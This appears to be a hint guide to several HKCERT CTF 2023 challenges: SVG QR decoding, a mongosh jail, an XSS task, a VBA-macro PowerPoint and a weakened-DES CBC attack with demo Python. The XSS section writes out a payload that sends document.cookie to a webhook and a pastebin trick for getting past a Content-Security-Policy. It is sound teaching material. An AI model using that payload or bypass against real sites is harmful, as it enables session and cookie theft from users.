# HKCERT CTF 2023: Guide to handwavy challenges (II)

[TOC]

## ST碼 (I) / ST Code (I) (Misc)

* Browsing `/flag1` results in a QR Code, but it looks uneven
* If you read the source code of the server carefully, you should notice that it is a scalable vector graphic (SVG)
* View the source of the image and you will find some `rx="0"` and `rx="1"` attributes, which are suspicious
* This is why the image looks uneven
* Record these numbers from top to bottom and you should get `01101000 01101011 ...`
* Can you guess what the encoding scheme is? __________
* Decoding with this encoding scheme, you should get `hkcert23{...`
* Looks like this is the flag!

<p style="transform: rotate(-180deg);">Answer: Binary ASCII Code</p>

## 獄門疆 / MongoJail (Pwn)

### Partial Spoiler

* This challenge seems to be unrelated to "Goku Mon Kyo"
* But it is related to the MongoDB Shell (mongosh)
* mongosh is a specialized node.js "Read–eval–print loop" (REPL) environment
* You can enter any JavaScript code in a restricted mongosh
* All built-in variables and functions, as well as `require`, `module` and `globalThis`, are ~~sealed~~ made undefined
* What else can we do? Let's have a look at the [Reference](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference)
* Built-in objects are all ~~sealed~~ made undefined
* Expressions & operators can still be used... At least you can do addition
* ||Spoiler: Which method can be used to open the other side of the seal?||

## 又有寶貝 XSS / Baby XSS again (Web)

* First, you should have some understanding of XSS challenges in CTF
* If you have no idea, maybe check out the description of [Infant XSS](https://github.com/blackb6a/hkcert-ctf-2021-challenges/tree/master/T1-infantxss) from HKCERT CTF 2021...
* Basically you need to find an XSS vulnerability and send the webpage with the payload to the bot to perform sensitive actions or capture sensitive information, such as the Cookie
* For this challenge, the description has already told you that you can inject a script using the `src` query string parameter, because of the following:
  ```
  out += """<script src="%s"></script>""" % request.args.get("src", "http://example.com/")
  ```
* But there is a Content Security Policy that restricts the source of scripts to the domains `https://hcaptcha.com`, `https://*.hcaptcha.com` or `https://pastebin.com`:
  ```
  <meta http-equiv="Content-Security-Policy" content="script-src https://hcaptcha.com https://*.hcaptcha.com https://pastebin.com">
  ```
* I don't think you want to craft your gadget on hcaptcha.com, so let's go for pastebin
* First, craft a script that redirects the victim to your webhook, which captures the sensitive information (the flag is in the Cookie for this challenge), and post it on pastebin
* For example, `location='https://webhook.site/your_webhook_site_id/?cookie='+document.cookie`
* Then you should see your paste like this: https://pastebin.com/KvbMXuyv
* To keep only the script code, you may use the "raw" function: https://pastebin.com/raw/KvbMXuyv
* But when you try to include the script, it doesn't work!
* http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/raw/KvbMXuyv
* Why? Because modern browsers also check the `Content-Type` header of the embedded file
* The content type of the file is `text/plain` in this case, which will not be executed as JavaScript
* How about the other way?
  Instead of "raw", we may also try "download": https://pastebin.com/dl/KvbMXuyv
* This time it works, the page indeed redirects: http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/dl/KvbMXuyv
* Then you can send this link to the bot (and fill in the annoying CAPTCHA) and get the flag

## 轉蛋模擬器 / Gacha Simulator (Reverse)

### Partial Guide

This challenge is best viewed with .NET Framework

This is a pptm file, which is macro enabled. Make sure you check out the VBA code under the Developer tab.

https://support.microsoft.com/en-au/office/show-the-developer-tab-e1192344-5e56-4d45-931b-e5fd9bea2d45

Can't see the source code? Try this

https://stackoverflow.com/questions/1026483/is-there-a-way-to-crack-the-password-on-an-excel-vba-project

Then there are many ways to solve it, like changing the probability, rearranging the encrypted data, decrypting the encrypted data directly, etc. Good luck!

## 下手ですね / BADES (Crypto)

### Challenge Description

In this challenge, we are given a slightly modified [Data Encryption Standard](https://en.wikipedia.org/wiki/Data_Encryption_Standard) (denoted by DES'). Additionally, we are given two oracles:

1. `encrypt_flag` encrypts the flag using DES'-CBC.
2. `encrypt` encrypts an arbitrary message using DES'-CBC.

The goal is to retrieve the flag using the above oracle calls.

### Partial Guide

With `__left_rotations` being changed, _all_ keys become weak keys (a DES weak key is one whose 16 round subkeys are all identical, so decryption, which applies the subkeys in reverse order, is exactly the same operation as encryption). If we were using the [electronic codebook (ECB)](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)) mode of operation, $\text{Encrypt}(\text{Encrypt}(m)) = m$, or intuitively, encrypting the same message twice would give back the message.

<p style="text-align: center;"><img src="https://hackmd.io/_uploads/HJDX812mp.png" style="width: 350px;"><br /><em>Figure 1.</em></p>

However, in this case we are using the CBC mode. This is how a message is encrypted when we use `encrypt_flag` (or `encrypt`).
At the very beginning, the message is padded to a multiple of 8 bytes. After that, it is chopped into blocks of 8 bytes:

<p style="text-align: center;"><img src="https://hackmd.io/_uploads/ryrKjy2mT.png" style="width: 600px;"><br /><em>Figure 2.</em></p>

It is then encrypted to the ciphertext $c_0 \| c_1 \| c_2 \| \ldots$ which is given to us, where $c_0$ is the IV. How can we make use of the "encrypting the ciphertext actually decrypts it" behaviour to recover $m_1, m_2, \ldots$?

Let's show how we retrieve $m_1$ by passing $c_0 \oplus c_1$ to `encrypt`, which (as in Figure 3) chains with the same IV $c_0$:

<p style="text-align: center;"><img src="https://hackmd.io/_uploads/S1jaXx37a.png" style="width: 350px;"><br /><em>Figure 3.</em></p>

Since $c_0 \oplus (c_0 \oplus c_1) = c_1$, the block actually fed into the block cipher is $c_1$. From Figure 2 we have $c_1 = \text{Encrypt}(c_0 \oplus m_1)$, and because Encrypt is its own inverse, $\text{Encrypt}(c_1) = c_0 \oplus m_1$. Now we can recover $m_1$ by computing $c_0 \oplus (c_0 \oplus m_1)$. Now decrypt the remaining blocks!
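The attack above, carried through for every block, as an added example that is not the challenge's code. Since the DES' source is not reproduced on this page, a toy 16-round Feistel network that uses the same subkey in every round stands in for it: that is exactly the property that makes DES weak keys (and every DES' key) an involution. The key, IV and flag are constructed for the demo, and the example assumes, as Figure 3 does, that `encrypt` chains with the same fixed IV $c_0$ as `encrypt_flag`. The attacker side (`recover_flag`) only touches the ciphertext and the `encrypt` oracle, never the key.

```python
# Added example, not the challenge's own code: toy involutory block cipher standing in
# for DES', a fixed-IV CBC oracle, and the block-by-block plaintext recovery.
BLOCK = 8
MASK32 = 0xFFFFFFFF
ROUNDS = 16


def _f(r, k):
    """Round function: any keyed 32-bit mixing works, it need not be invertible."""
    x = (r ^ k) & MASK32
    x = (x * 0x9E3779B1) & MASK32
    x ^= x >> 15
    return x & MASK32


def block_encrypt(block, key):
    """DES-like Feistel network in which every round uses the SAME subkey.

    Decryption of a Feistel cipher is the same network with the subkeys reversed;
    with identical subkeys it is the same operation, so E(E(x)) == x.
    """
    l = int.from_bytes(block[:4], "big")
    r = int.from_bytes(block[4:], "big")
    for _ in range(ROUNDS):
        l, r = r, l ^ _f(r, key)
    # As in DES, undo the swap of the final round; without this it is not an involution.
    return r.to_bytes(4, "big") + l.to_bytes(4, "big")


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def pad(msg):
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n


def unpad(msg):
    return msg[:-msg[-1]]


def cbc_encrypt(msg, key, iv):
    """CBC: c_i = E(m_i XOR c_{i-1}); returns c_0 || c_1 || c_2 || ... with c_0 = iv."""
    data = pad(msg)
    prev, out = iv, iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(xor(data[i:i + BLOCK], prev), key)
        out += prev
    return out


# Constructed secrets: in the real challenge the attacker sees none of these.
KEY = 0x1337C0DE
IV = bytes.fromhex("0123456789abcdef")   # assumed fixed across oracle calls (Figure 3)
FLAG = b"hkcert23{constructed_example_flag_for_this_demo}"


def encrypt_flag():
    return cbc_encrypt(FLAG, KEY, IV)


def encrypt(msg):
    return cbc_encrypt(msg, KEY, IV)


def recover_flag(ct, oracle=encrypt):
    """Recover m_1, m_2, ... from c_0 || c_1 || ... using only the encrypt oracle."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    c0 = blocks[0]
    plain = b""
    for i in range(1, len(blocks)):
        # Submitting c_0 XOR c_i feeds c_i into the block cipher, so the oracle's
        # first ciphertext block is E(c_i) = m_i XOR c_{i-1} (E is an involution).
        y = oracle(xor(c0, blocks[i]))[BLOCK:2 * BLOCK]
        plain += xor(y, blocks[i - 1])
    return unpad(plain)


if __name__ == "__main__":
    ct = encrypt_flag()
    print(recover_flag(ct))
```

One oracle query per ciphertext block is enough; the padding the oracle appends only affects blocks after the first, which the attack never reads.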